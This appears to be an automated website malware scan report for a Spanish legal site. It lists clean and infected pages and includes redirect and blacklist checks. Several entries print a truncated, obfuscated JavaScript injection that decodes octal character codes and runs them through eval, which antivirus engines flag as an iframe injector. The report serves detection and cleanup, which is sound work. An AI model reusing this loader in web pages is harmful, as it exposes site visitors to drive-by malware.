New scan:

Malware Scanner report for gipuzkoalegal.com

Malicious/Suspicious/Total urls checked
7/0/15
7 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://gipuzkoalegal.com/
200 OK
Content-Length: 4744
Content-Type: text/html
clean
http://gipuzkoalegal.com/es/quienes.html
200 OK
Content-Length: 6249
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0155,0152,0160,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,01
... 1496 bytes are skipped ...
,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0155,0152,0160,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0155,0152,0160,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://gipuzkoalegal.com/es/../index.html
200 OK
Content-Length: 4744
Content-Type: text/html
clean
http://gipuzkoalegal.com/es/../es/quienes.html
200 OK
Content-Length: 6249
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0155,0152,0160,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,01
... 1496 bytes are skipped ...
,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0155,0152,0160,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0155,0152,0160,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://gipuzkoalegal.com/es/../es/../index.html
200 OK
Content-Length: 4744
Content-Type: text/html
clean
http://gipuzkoalegal.com/es/../es/../es/quienes.html
200 OK
Content-Length: 6249
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0155,0152,0160,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,01
... 1496 bytes are skipped ...
,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0155,0152,0160,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0155,0152,0160,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://gipuzkoalegal.com/es/../es/../es/../index.html
200 OK
Content-Length: 4744
Content-Type: text/html
clean
http://gipuzkoalegal.com/es/../es/../es/../es/quienes.html
200 OK
Content-Length: 6249
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0155,0152,0160,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,01
... 1496 bytes are skipped ...
,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0155,0152,0160,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0155,0152,0160,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://gipuzkoalegal.com/es/../es/../es/../es/../index.html
200 OK
Content-Length: 4744
Content-Type: text/html
clean
http://gipuzkoalegal.com/es/../es/../es/../es/../es/quienes.html
200 OK
Content-Length: 6249
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0155,0152,0160,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,01
... 1496 bytes are skipped ...
,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0155,0152,0160,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0155,0152,0160,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://gipuzkoalegal.com/es/../es/../es/../es/../es/../index.html
200 OK
Content-Length: 4744
Content-Type: text/html
clean
http://gipuzkoalegal.com/es/../es/../es/../es/../es/../es/quienes.html
200 OK
Content-Length: 6249
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0155,0152,0160,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,01
... 1496 bytes are skipped ...
,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0155,0152,0160,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0155,0152,0160,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://gipuzkoalegal.com/es/../es/../es/../es/../es/../es/../index.html
200 OK
Content-Length: 4744
Content-Type: text/html
clean
http://gipuzkoalegal.com/es/../es/../es/../es/../es/../es/../es/quienes.html
200 OK
Content-Length: 6249
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0155,0152,0160,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,01
... 1496 bytes are skipped ...
,073,071,054,0141,0146,0163,073,044,046,070,012,07,035,035,035,035,035,035,035,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0144,0142,0161,0102,0151,0142,0152,0142,0153,0161,077,0166,0106,0141,045,044,0155,0152,0160,044,046,053,0136,0155,0155,0142,0153,0141,0100,0145,0146,0151,0141,045,0155,0152,0160,046,070,012,07,035,035,035,035,0172,012,07,0172,046,045,046,070);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+3);}xz=e;if(window.document)if(v)xz(s)}

Antivirus reports:

TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Obfuscus.AACB!tr
AVG
HTML/Framer

http://gipuzkoalegal.com/es/../es/../es/../es/../es/../es/../es/../index.html
200 OK
Content-Length: 4744
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: gipuzkoalegal.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 May 2014 15:08:09 GMT
Accept-Ranges: bytes
ETag: "2153fd8-1288-4f544144cc401"
Server: Apache
Content-Length: 4744
Content-Type: text/html
Last-Modified: Sun, 23 Mar 2014 11:04:13 GMT

...4744 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gipuzkoalegal.com
Referer: http://www.google.com/search?q=gipuzkoalegal.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=gipuzkoalegal.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gipuzkoalegal.com/

Result: gipuzkoalegal.com is not infected or malware details are not published yet.